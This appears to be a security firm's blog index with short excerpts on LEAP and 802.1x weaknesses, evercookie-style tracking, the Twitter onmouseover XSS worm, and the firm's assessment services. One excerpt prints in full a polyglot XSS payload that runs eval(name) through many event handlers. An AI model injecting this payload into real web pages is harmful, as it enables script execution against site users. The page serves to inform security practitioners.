Can you possibly defend the statement that 802.1x with PEAP or EAP-TTLS can be worse than open wireless with no authentication or encryption? Remember the old Cisco LEAP implementation that was vulnerable to offline brute-force attacks due to sending users’ MS CHAP v2 challenge/response outside of a secure connection? Joshua Wright has documented this in detail and even...Read More

As if HTTP cookies, Local Shared Objects (Flash cookies), and web developer’s understanding of them wasn’t a big enough security issue, Samy Kamkar has written a JavaScript API for “virtually irrevocable persistent cookies.”Want to keep track of users even after they remove their cookies, switch browsers, clear cache, or whatever? No problem, just throw a reference to...Read More

So someone started a re-tweet XSS worm on Twitter. They were able to embed a span class and provide an “Onmouseover” event that causes the post to be re-tweeted when hovered over. Twitter has “patched” but I still see lots of folks trying to prove them wrong. There’s some better analysis about the whole thing...Read More

Gareth Heyes of The Spanner came up with an XSS payload that works in multiple contexts and browsers. As always mileage will vary by vector and browser but I thought it was universal/cool enough to mention. javascript:/*–></marquee></script></title></textarea></noscript></style></xmp>”>[img=1]<img -/style=-=expression(/*’/-/*’,/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>”Read More

The majority of our assessment clients choose a full-disclosure approach to security assessments. They realize that this helps us maximize results in terms of vulnerabilities discovered thus providing the most value for a given cost. Other times assessment clients are interested in zero-knowledge assessments that simulate an attack from an outside threat with minimal knowledge...Read More

The main difference between our Basic and Standard web application security assessment services is that for Basic assessments, we only perform unauthenticated testing, unless of course we gain authenticated access through exploitation of some vulnerability. Our standard application security assessments test the application from both unauthenticated perspectives and authenticated perspectives of user roles in scope....Read More